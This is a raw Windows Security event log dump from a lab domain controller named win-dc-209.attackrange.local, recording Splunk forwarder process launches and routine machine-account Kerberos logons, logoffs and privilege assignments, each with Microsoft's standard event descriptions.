Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:08:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264381
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1424
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:08:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264382
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17f8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:08:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264384
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a30
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:08:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264383
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xacc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:08:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264385
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7FC030
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:08:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264388
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x801EE4
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:08:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264387
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x801EE4
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 62590
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:08:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264386
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x801EE4
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:09:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264399
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x80239F
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:09:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264398
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x80248D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:09:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=264397
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8024D5
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:09:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264396
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x802586
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62597
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:09:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264395
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x802586
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:09:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264394
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8024D5
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 62594
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:09:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264393
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8024D5
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:09:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264392
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x80248D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:09:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264391
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x80248D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:09:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=264390
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x80239F
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 62593
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:09:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=264389
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x80239F
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:09:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264401
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x14f0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:09:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264400
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1064
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:09:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264402
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x12b4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:09:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264403
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1360
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:09:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264404
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11d4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:09:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=264406
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1794
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
